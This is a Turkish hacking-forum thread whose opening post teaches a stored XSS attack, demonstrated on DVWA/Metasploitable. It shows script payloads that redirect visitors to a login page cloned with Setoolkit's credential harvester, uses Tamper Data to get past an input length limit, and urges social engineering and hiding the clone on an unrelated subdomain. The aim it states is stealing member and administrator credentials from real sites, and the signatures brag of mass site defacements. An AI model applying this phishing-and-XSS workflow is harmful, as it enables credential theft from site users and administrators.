THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

HACK | XSS Stored Açığı Kullanımı Detaylı Bilgi

JohnDoe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2013
Nereden:
Teşkilat
Yaş:
34
Mesajlar:
2.717
Konular:
572
Teşekkür (Etti):
805
Teşekkür (Aldı):
929
Ticaret:
(0) %
20-09-2015 04:23
#1
HACK | XSS Stored Açığı Kullanımı Detaylı Bilgi
Merhabalar,

Eski ve basit olmasına karşın güçlü bir tehlike arz eden bir açık türümüz var; XSS

Ve XSS açığının veri tabanına işlenmesine olanak sağlayan açık türü ise: XSS Stored

Örneğin elimizde bir web sayfası var ve biz buraya gerekli javascript kodlarını enjekte ettiğimizde;



Bize çıktısı şu olacaktır;



Yaptığımız işlem gayet basit, ekrana alert mesajını verdirdik.

Alıntı:
s c r i p t alert("Hacked Kaan Was Here");</script>
Bu gördüklerimiz basit bir XSS örneği idi. Bu kodlar veri tabanına kayıt olmaz, ancak XSS açığının bir türü var ki, eklenen kodlar veri tabanına kaydolur ve her girişimizde o kodlar çalışır.

Buna XSS Stored denir. Basit bir yönlendirme kodu eklenerek site index sayfasına yönlendirilebilir. Ancak bizim amacımız siteyi index atıp hack etmek değil, üye ve yönetici bilgilerini almaksa eğer farklı bir yöntem izlenmelidir.

Diyelim ki bir ziyaretçi defterin de xss stored açığı var. Aynı zamanda bu web sayfasının bir üye/yönetici giriş ekranı var. O zaman bir senaryo oluşturalım.


- Yönetici / Üye giriş ekranı klonlanır.
- Açığın olduğu yere javascript yönlendirme kodu enjekte edilir.
- Yönlendirme klonlanmış giriş sayfasına yapılır.
- Sosyal Mühendislik yolu ile üyelerin yorum yapması istenilir
- Ve bilgiler bu yol ile elimize geçer.

Evet, yapacaklarımızın listesi hazır. Hemen operasyon aşamasına geçelim, ben örnek olarak m e t a sploitable kullanacağım. İçerisinde ki DVWA uygulamasında XSS Stored açığı mevcut.

Not: m e t a sploitable kullanacak arkadaşlar sisteme giriş yaptıktan sonra (Kullanıcı Adı: admin, Şifre: password) DVWA Security kısmından high (zor) seçeneğini low (kolay) olarak değiştirmelidirler. Yoksa kodlar çalışmayacaktır.


Gerekli Uygulamalar;

- Setoolkit
- Tamper Data

Hemen bir deneme yapıyoruz;





Evet açık mevcut, demek ki buraya yönlendirme yapmak mümkün. O zaman bu scriptin giriş sayfasını klonlayalım. Bunun için setoolkit aracı biçilmiş kaftandır diyebiliriz. Kali linux üzerinde terminale setoolkit diyerek uygulamayı başlatabilirsiniz. Daha sonra sırası ile şu adımları izleyin.

1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Bu adımları takip ettikten sonra bize IP Address for the POST back in Harvester/Tabnabbing: diye bir soru soracak. Bizden istediği klonlanacak sayfanın hangi siteye göre hazırlanacağı dır. Ben yerel sunucu üzerinde çalışacağım için kendi yerel ip adresimi yazacağım, siz dosyaları nereye yükleyecek iseniz (hangi adrese yönlendirecek iseniz) oranın ismini yazın.

Daha sonra bizden Enter the url to clone: diyerek klonlanacak sayfayı isteyecektir. Açığın bulunduğu web sayfasında ki giriş panelinin ismini yazıyoruz.



Gördüğünüz gibi bize /var/www içerisine klonladığını söylüyor. Buradaki tüm dosyaları, hangi sayfaya yönlendirecek iseniz oraya aktarıyoruz. Benim ki yerel sunucu üzerinde, orada bırakıyorum. Şimdi sıra yönlendirme kodunu enjekte etmekte. Tekrar ziyaretçi defterine dönüyoruz.

Kodu eklerken ufak bir sıkıntı ile karşılaşıyoruz, karakter sınırlaması var. Tüm kodu ekleyemiyoruz.

Alıntı:
s c r i p t window.l o c a t i o n ="http://yonendirilecekadres</script>
yonlendirilecekadres kısmına, klonlanmış scripti yüklediğimiz siteyi yazıyoruz.



Görüldüğü gibi kodun bir kısmı (</ dan sonrası) karakter sınırlaması nedeni ile yazılmıyor. O zaman biz de Tamper Data eklentisi ile yükleriz. Mozilla / araçlar sekmesinden Tamper Data’yı açıyoruz ve Start Tamper diyoruz. Hemen ardından Sign Guestbook butonuna tıklıyoruz. Gelen uyarıya tamper diyoruz ve ekranımız açılıyor.



mtxMessage kısmına kodlarımızın kalanını yazıyoruz. en son </ kısmını yazmıştık, devamı script> olmalı. > karakterinin kodlamada ki karşılığı > dir çünkü. Ok diyoruz ve kaydı onaylıyoruz. Sonuç olarak onaylanır onaylanmaz bizi giriş sayfasına yönlendirdi.

Eğer url yapısına dikkat etmezse yine giriş yapması gerektiğini düşünüp giriş yapacaktır ve giriş bilgileri de, scriptin kurulu olduğu dizine kaydedilecektir. Benim localhost üzerinde kayıtlı olduğu için /var/www dizinini içerisinde bulunuyor. Giriş yapıp kontrol edelim.



Görüldüğü gibi, ben giriş yapınca bilgiler de scriptin kurulu olduğu dizinde ki bir txt belgesine eklenmiş oldu. Basit bir sosyal mühendislik, iyi bir taktik ile daha bir çok bilgiye erişilebilir. Setoolkit aracının hünerlerini ileri ki zamanlarda anlatmaya devam edeceğim, beklemede kalın.

Not: Örneğin http://exitstars.com/forum/login.php sayfası klonlanacak ise ve sizin elinizde bluedream.com adlı bir site varsa şöyle bir sub domain açabilirsiniz ve dosyaları oraya kopyalayabilirsiniz, daha az dikakt çekecektir.

Kolay gelsin.
--------------------- " TürkHackTeam "Vatan Operasyonu" 4093 Site Hacked [Şehitler Ölmez Vatan Bölünmez ! "
Türkiye'nin tek milli ve yerli #Hack grubu TürkHackTeam'dır. İçiniz rahat olsun biz buradayız.
Konu JohnDoe tarafından (20-09-2015 04:25 Saat 04:25 ) değiştirilmiştir.
BadRookie, egeklan Teşekkür etti.
BadRookie - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2014
Nereden:
System32
Mesajlar:
635
Konular:
58
Teşekkür (Etti):
235
Teşekkür (Aldı):
243
Ticaret:
(0) %
20-09-2015 04:24
#2
Hocam devamını bizzat bekliyorum Elinize sağlık
---------------------
Madagaskar 15 Devlet Sitesi Hacked

Madem ben de bu vatanın bir evlâdıyım, bu vatanın saadetine hizmet etmek benim için farzdır.
(105)emirdağ lahikası
BEDİÜZZAMAN

iletişim: badrookie.tht@gmail.com
egeklan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
10/2012
Mesajlar:
964
Konular:
89
Teşekkür (Etti):
431
Teşekkür (Aldı):
483
Ticaret:
(0) %
20-09-2015 04:26
#3
Ellerine sağlık. Benim için bayağı yararlı oldu. Emeğine sağlık
cimbomenes1905 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2014
Nereden:
127.0.0.1
Mesajlar:
1.860
Konular:
78
Teşekkür (Etti):
271
Teşekkür (Aldı):
325
Ticaret:
(0) %
20-09-2015 09:23
#4
eline sağlık abi

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler